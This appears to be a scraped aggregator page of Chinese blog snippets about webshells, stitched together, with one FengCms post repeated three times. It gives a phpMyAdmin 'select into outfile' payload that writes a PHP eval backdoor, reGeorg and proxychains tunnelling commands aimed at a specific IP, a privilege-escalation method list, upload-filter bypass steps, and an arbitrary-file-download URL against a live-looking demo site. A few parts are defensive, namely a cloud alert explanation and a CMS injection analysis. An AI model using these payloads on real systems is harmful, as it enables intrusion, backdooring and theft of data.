webshell

修复网站漏洞对phpmyadmin防止被入侵提权的解决办法

感情迁移 提交于 2019-12-01 12:41:07
phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多一些,最近phpmysql爆出漏洞,尤其是弱口令,sql注入漏洞,都会导致mysql的数据账号密码被泄露,那么如何通过phpmyadmin来上传提权webshell呢 首先我们来搭建一下PHP+mysql环境,linux centos系统,PHP的版本是5.3,mysql版本是5.6,linux系统64位,apache 2.2版本,部署在新开的一台阿里云的按量付费ECS服务器。 phpmyadmin漏洞利用 利用mysql数据库select into outfile方式来写入webshell到网站的根目录下,该漏洞的利用前提是必须知道网站的当前路径是多少,如何知道网站的当前路径,这个要通过爆出网站的错误来进行查看绝对的路径。使用下面的代码: select load_file('/home/www/safe.php') select '<?php eval($_POST[sine]); ?>' into outfile '/home/www/safe.php'; 执行这个语句就可以生成一句话的木马后门。 也可以使用写数据库日志的方式来进行漏洞的利用,前提是mysql的版本都是5.0以上的,以及日志开启,如果没有开启日志功能,我们需要在phpmyadmin里进行开启,语句如下:set

常用webshell提权方法总结

和自甴很熟 提交于 2019-12-01 11:51:12
01.pcAnywhere提权 02.利用HASH破解提权 03.MYSQL提权(udf.dll) 04.Churrasco提权 05.利用sogou输入法(6.0)提权 06.lcx内网端口转化,解决在内网不能远程桌面登录 07.6Gftp提权 08.Serv-U6.4提权 09.VNC密码的破解和提权 10.Radmin提权 11.360安全卫士提权 12.启动项提权 来源: https://www.cnblogs.com/xiaolusafe/p/11684088.html

拿到webshell之后的事情

℡╲_俬逩灬. 提交于 2019-12-01 10:32:47
之前搞站都是搞到后台管理员,或者搞到webshell就宣布结束了,,今天终于有机会学习一下后面的操作了。 公司网站为php的站,已经拿到webshell。可以进行菜刀连接。 菜刀虚拟终端 php -m #查看php是否有socket库,因为reGeory需要用到sockets库。 如果没有sockets,则上传的tunnel.php需要添加dl("php_sockers.dll") reGeorg + proxychains 代理内网 reGeorg 本地代理 python reGeorgSocksProxy.py -p 8080 -u http://222.252.10.101:8080/tunnel.php #将http://222.252.10.101:8080代理到本地的8080端口 然后复制一个终端,proxychains上场。 注意proxychains的配置信息 vi /etc/proxychains.conf 添加 socket5 127.0.0.1 8080 #端口为上面配置的port 因为reGeorg使用的sockets协议,只支持tcp,所以没法ping通。 proxychains nmap -sT -Pn 172.168.10.50 看到445端口,就要想到ms17-010呀,你也可以proxychains命令行调用一下Nessus扫一下哈

安全术语介绍

蹲街弑〆低调 提交于 2019-12-01 10:20:41
一、肉鸡、抓鸡 1:肉鸡 一些个人PC电脑和网吧主机,以及各类网站上的服务器,黑客通过各类手段攻击植入木马、病毒方式到机器上,成为黑客掌控的机器,也叫肉鸡。成为肉鸡的机器,黑客可以随便查看文件和执行一些操作。 肉鸡也可以用来攻击,肉鸡攻击方式一般都是成千上万台肉鸡联合去攻击一台或者多台机器,其主要目的是致使对方机器和站点进入瘫痪状态,无法正常运行。 2:抓鸡 通过扫描漏洞、暴力破解、弱口令方式进行对机器植入木马达到控制机器,常见的做法是通过扫描一些端口号,比如:1433抓鸡、3389抓鸡、3306抓鸡等,获取机器的漏洞,从而实现种马,这个过程叫抓鸡。 二、计算机木马、网页木马 1:计算机木马 黑客通过编写的后门程序,进行捆绑到一些互联网上常用的程序压缩包中,然后发布在互联网上,引诱用户进行下载并执行使用,从而达到种马机器被黑客窥探文件内容隐私、破坏系统、远程操控等。 2:网页木马(网页木马中又分布一些术语,大马、小马、一句话木马。) 大马:体积比较大,功能丰富齐全,可以更改、浏览等,种马机器上的文件目录,扫描端口。常见大马有webshell,webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起

ctf基本的文件上传与绕过学习

此生再无相见时 提交于 2019-11-30 21:46:20
绕过客户端校验前台脚本检测扩展名上传webs hell 原理: 当用户在客户端选择文件点击上传的时候,客户端还没有向服务器发送任何 消息,就对本地文件进行检测来判断是否是可以上传的类型,这种方式称为前台 脚本检测扩展名。 绕过前台脚本检测扩展名,就是将所要上传文件的扩展名更改为符合脚本检 测规则的扩展名,通过 BurpSuite 工具,截取数据包,并将数据包中文件扩展名 更改回原来的,达到绕过的目的 实验: 打开要上传的页面,上传要上传的木马文件lurb.php,点击上传。 页面显示错误 返回上传页面,点击浏览,选择要上传的木马文件lubr.jpg(把lubr.php重命名 lubr.jpg) 上传用burpsuite抓包,将.jpg改为.php,点击’forward’发送数据包,进行绕过。 绕过 Content-Type 检测文件类型上传 原理: 当浏览器在上传文件到服务器的时候,服务器对所上传文件的Content-Type类型进行检测,如果是白名单允许的,则可以正常上传,否则上传失败。绕过Content–Type文件类型检测,就是用BurpSuite 截取并修改数据包中文件的Content-Type类型,使其符合白名单的规则,达到上传的目的。 实验: 打开要上传文件的页面,上传木马lubr.php。报错 利用burpsuite抓包更改Content

FengCms上传Webshell

五迷三道 提交于 2019-11-30 21:35:51
今天拿一个演示站做测试 首页很平常,有一个输入框,可能有注入漏洞。 查看源代码后,在最底下有一行注释,提示一些信息,有门! 上网搜查下FengCms,发现FengCms是由地方网络工作室完全知识产权打造的一套适用于个人、企业建站的内容管理系统。在这个网页上有相关的漏洞 https://www.seebug.org/appdir/FengCMS 这次使用的是任意文件下载漏洞 通过扫描发现这段PHP代码有明显的漏洞。 通过找到这个文件名,base64编码后获取文件内容,将其下载到本地。 演示站证明: http://guf521656.h163.92hezu.org/?controller=down&file=Y29uZmlnLnBocA 打开后发现MySQL的用户名和密码 用nmap扫描到演示站开着3306端口 利用所得的账号密码,进入数据库 根据phpinfo.php中,找到的绝对路径 /var/www/html document_root的值,得到网站的绝对路径 利用MySQL上传一句话木马 就会发现 /upload/ 下多出 1.php 文件,上传成功 随后可用中国菜刀链接到网站,提取里面的信息~ 原文: 大专栏 FengCms上传Webshell 来源: https://www.cnblogs.com/dajunjun/p/11641231.html

FengCms上传Webshell

拥有回忆 提交于 2019-11-30 21:31:20
今天拿一个演示站做测试 首页很平常,有一个输入框,可能有注入漏洞。 查看源代码后,在最底下有一行注释,提示一些信息,有门! 上网搜查下FengCms,发现FengCms是由地方网络工作室完全知识产权打造的一套适用于个人、企业建站的内容管理系统。在这个网页上有相关的漏洞 https://www.seebug.org/appdir/FengCMS 这次使用的是任意文件下载漏洞 通过扫描发现这段PHP代码有明显的漏洞。 通过找到这个文件名,base64编码后获取文件内容,将其下载到本地。 演示站证明: http://guf521656.h163.92hezu.org/?controller=down&file=Y29uZmlnLnBocA 打开后发现MySQL的用户名和密码 用nmap扫描到演示站开着3306端口 利用所得的账号密码,进入数据库 根据phpinfo.php中,找到的绝对路径 /var/www/html document_root的值,得到网站的绝对路径 利用MySQL上传一句话木马 就会发现 /upload/ 下多出 1.php 文件,上传成功 随后可用中国菜刀链接到网站,提取里面的信息~ 原文: 大专栏 FengCms上传Webshell 来源: https://www.cnblogs.com/peterchan1/p/11641128.html

FengCms上传Webshell

旧城冷巷雨未停 提交于 2019-11-30 21:29:00
今天拿一个演示站做测试 首页很平常,有一个输入框,可能有注入漏洞。 查看源代码后,在最底下有一行注释,提示一些信息,有门! 上网搜查下FengCms,发现FengCms是由地方网络工作室完全知识产权打造的一套适用于个人、企业建站的内容管理系统。在这个网页上有相关的漏洞 https://www.seebug.org/appdir/FengCMS 这次使用的是任意文件下载漏洞 通过扫描发现这段PHP代码有明显的漏洞。 通过找到这个文件名,base64编码后获取文件内容,将其下载到本地。 演示站证明: http://guf521656.h163.92hezu.org/?controller=down&file=Y29uZmlnLnBocA 打开后发现MySQL的用户名和密码 用nmap扫描到演示站开着3306端口 利用所得的账号密码,进入数据库 根据phpinfo.php中,找到的绝对路径 /var/www/html document_root的值,得到网站的绝对路径 利用MySQL上传一句话木马 就会发现 /upload/ 下多出 1.php 文件,上传成功 随后可用中国菜刀链接到网站,提取里面的信息~ 原文: 大专栏 FengCms上传Webshell 来源: https://www.cnblogs.com/sanxiandoupi/p/11641077.html

阿里云异常网络连接-可疑WebShell通信行为的分析解决办法

余生颓废 提交于 2019-11-30 15:58:30
2018年10月27日接到新客户网站服务器被上传了webshell脚本木马后门问题的求助,对此我们sine安全公司针对此阿里云提示的安全问题进行了详细分析,ECS服务器被阿里云提示 异常网络连接-可疑WebShell通信行为 ,还会伴有, 网站后门-发现后门(Webshell)文件 ,以及提示 网站后门-一句话webshell 的安全提示,但是大部分都是单独服务器ECS的用户,具体被阿里云提示的截图如下: 点开消息后的内容为:受影响资产 iZ2393mzrytZ 访问者IP Webshell URL 事件说明:云盾检测到有疑似黑客正在通过Webshell访问该服务器,可能是因为服务器上网站存在漏洞被植Webshell或者因为已发现的Webshell未及时删除导致黑客入侵。黑客可通过该Webshell窃取网站核心资料,篡改数据库等危险操作。 解决方案:建议按照告警中提示URL查找网站对应磁盘文件进行删除,并及时登录安骑士"网站后门"控制台,对未隔离的后门文件进行及时隔离,避免更一步损失。 看到这些阿里云提示内容后,我们对客户网站出现的问题进行分析,阿里云的提示是反复性的提醒客户,比如9.26日被提示锅2次,过了网站被上传webshell文件后,又被阿里云安全提示,首先我们要清楚为何会被提示可疑webshell通信行为以及网站后门-一句话webshell和发现后门webshell文件

网站漏洞修复之苹果cms电影系统

百般思念 提交于 2019-11-30 15:58:16
苹果cms系统,是目前很多电影网站都在使用的一套网站系统,开源,免费,扩展性较好,支持一键采集,伪静态化,高并发的同时承载,获得的很多站长的喜欢,于近日被网站安全检测发现,maccms存在网站漏洞,sql注入盲射获取数据库的管理员账号密码,关于该漏洞的详情,我们仔细分析看下. maccms漏洞分析与修复 苹果CMS采用的是php语言开发的代码,使用的数据库是mysql类型,这种架构是比较常用的,也是比较稳定的,但是在安全方面出现的问题是比较多的,这次发现的是sql注入漏洞,在网站的根目录下的inc文件里的module目录下的vod.php代码如下图所示: 代码里的empty($wd函数,在进行判断如果是,或者不是的逻辑过程当中,会将前段用户访问带来的参数,进行安全过滤,我们跟进代码来追寻到苹果CMS的配置文件,在function.php配置文件代码李看到对网站的所有请求方式包括get、post、cookies的提交方式都强制性的进行了安全转义。网站漏洞问题的发生就在这里. 我们仔细又发现,maccms使用了360安全提供的防止sql注入拦截代码。360的防止sql注入是好几年前开发,并公开在网络上的,已经很久没有更新维护了并且还存在sql注入代码绕过的情况,参数值之间进行实体转换的时候,360的sql拦截规则没有对空白符以及反斜杠进行拦截,导致可以绕过插入恶意参数